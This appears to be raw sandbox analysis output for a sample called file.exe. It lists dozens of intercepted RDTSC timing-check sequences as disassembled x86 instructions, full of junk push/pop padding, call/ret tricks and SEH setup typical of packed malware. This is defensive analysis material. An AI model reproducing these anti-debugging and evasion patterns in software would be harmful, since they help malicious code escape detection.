                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32F1 second address: 6C32F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7181EA second address: 7181EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7181EE second address: 718256 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F66C0B35948h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D25EFh], ebx 0x00000028 push 00000000h 0x0000002a jp 00007F66C0B3594Ch 0x00000030 push 00000000h 0x00000032 jg 00007F66C0B3594Ch 0x00000038 xchg eax, esi 0x00000039 jns 00007F66C0B35950h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jo 00007F66C0B3594Ch 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718256 second address: 71825A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715CD0 second address: 715CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CE01 second address: 71CE0B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715CD4 second address: 715D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F66C0B35948h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 call 00007F66C0B35957h 0x0000002e or ebx, 4344BE36h 0x00000034 pop edi 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c sub dword ptr [ebp+122D3735h], ebx 0x00000042 mov eax, dword ptr [ebp+122D0C09h] 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007F66C0B35948h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 mov dword ptr [ebp+122D1F36h], edi 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D32A0h], ebx 0x00000070 mov di, E0B3h 0x00000074 nop 0x00000075 pushad 0x00000076 jnl 00007F66C0B3594Ch 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CE0B second address: 71CE37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 389C63BCh 0x0000000f push 00000000h 0x00000011 mov ebx, edi 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D1E87h], eax 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop eax 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CE37 second address: 71CE5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35956h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F66C0B3594Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CE5C second address: 71CE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71CE60 second address: 71CE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715D76 second address: 715DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F66C0B351FCh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71BFA9 second address: 71BFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD13 second address: 71DD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD18 second address: 71DD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD1E second address: 71DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD22 second address: 71DD78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F66C0B35950h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1CD0h], edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F66C0B35948h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov bx, 5EBBh 0x00000035 push 00000000h 0x00000037 clc 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jg 00007F66C0B35946h 0x00000042 pushad 0x00000043 popad 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71BFAD second address: 71C04B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66C0B351FBh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F66C0B35202h 0x00000014 jmp 00007F66C0B35203h 0x00000019 pop edi 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D1DFEh], esi 0x00000021 mov dword ptr [ebp+122D32E5h], edx 0x00000027 popad 0x00000028 push dword ptr fs:[00000000h] 0x0000002f adc bx, B747h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov di, EAC2h 0x0000003f mov eax, dword ptr [ebp+122D0A71h] 0x00000045 mov dword ptr [ebp+122D32CBh], edi 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007F66C0B351F8h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 mov bx, D380h 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jns 00007F66C0B351F8h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD78 second address: 71DD7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD7D second address: 71DD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD83 second address: 71DD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD90 second address: 71DD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721E52 second address: 721E70 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F66C0B35952h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722A32 second address: 722A57 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66C0B35207h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727927 second address: 727931 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66C0B35946h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727931 second address: 727941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66C0B351FAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727941 second address: 72795B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66C0B35956h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72795B second address: 727980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66C0B351FDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D794 second address: 72D79A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D79A second address: 72D7A8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72DFBA second address: 72DFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72DFC9 second address: 72DFE0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [eax] 0x0000000d je 00007F66C0B35204h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72DFE0 second address: 72DFE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72DFE4 second address: 72E001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66C0B351FFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E001 second address: 72E005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E005 second address: 72E00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E0DA second address: 72E0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E0DE second address: 72E10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F66C0B35203h 0x00000010 jmp 00007F66C0B351FFh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E10C second address: 72E121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F66C0B35946h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E121 second address: 72E125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E125 second address: 72E13F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66C0B3594Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E13F second address: 72E144 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E144 second address: 72E169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F66C0B35958h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733E2B second address: 733E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733E31 second address: 733E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733E35 second address: 733E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73334B second address: 733356 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733B11 second address: 733B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733B15 second address: 733B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733B19 second address: 733B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739551 second address: 739555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7382CB second address: 7382FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F66C0B351FCh 0x0000000e jbe 00007F66C0B351F6h 0x00000014 push edx 0x00000015 jnc 00007F66C0B351F6h 0x0000001b jmp 00007F66C0B35203h 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738A3B second address: 738A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738A3F second address: 738A5E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66C0B351F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F66C0B35203h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F84 second address: 737F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F8E second address: 737FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F66C0B351F6h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F66C0B351F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737FA4 second address: 737FE5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66C0B35946h 0x00000008 jmp 00007F66C0B3594Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F66C0B3594Ch 0x00000015 jmp 00007F66C0B35953h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jno 00007F66C0B35946h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737FE5 second address: 737FEF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F66C0B351FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73926F second address: 739293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F66C0B3594Eh 0x0000000e jo 00007F66C0B35946h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F66C0B3594Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739293 second address: 739297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739297 second address: 7392B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35953h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C767 second address: 73C771 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B351F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C771 second address: 73C789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66C0B3594Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C789 second address: 73C7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35209h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F66C0B351FEh 0x00000011 pop ecx 0x00000012 ja 00007F66C0B351F8h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C7C6 second address: 73C7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F66C0B35946h 0x0000000a jp 00007F66C0B35946h 0x00000010 popad 0x00000011 pushad 0x00000012 jno 00007F66C0B35946h 0x00000018 jnl 00007F66C0B35946h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7021A6 second address: 70220B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F66C0B351F6h 0x00000009 jmp 00007F66C0B35209h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 and ecx, 543437AFh 0x0000001a lea eax, dword ptr [ebp+1248AF75h] 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F66C0B351F8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a push eax 0x0000003b pushad 0x0000003c jp 00007F66C0B351F8h 0x00000042 push edx 0x00000043 pop edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 pop esi 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70220B second address: 6EA89B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor ecx, 131465C7h 0x00000014 call dword ptr [ebp+122D21F2h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pop edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop eax 0x00000022 jmp 00007F66C0B3594Fh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7022CE second address: 7022D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7022D2 second address: 7022EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F66C0B3594Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7022EA second address: 702378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 mov dh, 8Bh 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov dword ptr fs:[00000000h], esp 0x00000019 sub dword ptr [ebp+122D1AA1h], edx 0x0000001f mov dword ptr [ebp+1248AFCDh], esp 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F66C0B351F8h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f pushad 0x00000040 push ecx 0x00000041 jmp 00007F66C0B35202h 0x00000046 pop ecx 0x00000047 mov ecx, 4B97802Dh 0x0000004c popad 0x0000004d cmp dword ptr [ebp+122D2A13h], 00000000h 0x00000054 jne 00007F66C0B3528Ch 0x0000005a mov dl, 96h 0x0000005c mov byte ptr [ebp+122D1BF9h], 00000047h 0x00000063 mov eax, D49AA7D2h 0x00000068 mov edi, dword ptr [ebp+122D2A53h] 0x0000006e nop 0x0000006f jp 00007F66C0B351FAh 0x00000075 push eax 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702378 second address: 70237C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70274A second address: 702761 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B351FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702761 second address: 702779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35953h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702779 second address: 70277F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70277F second address: 7027CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F66C0B3594Dh 0x00000015 pop eax 0x00000016 jmp 00007F66C0B35958h 0x0000001b push 5724EA5Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F66C0B35952h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7028B3 second address: 7028B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7028B7 second address: 7028BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702B80 second address: 702B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702B84 second address: 702BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F66C0B35950h 0x00000011 rdtsc
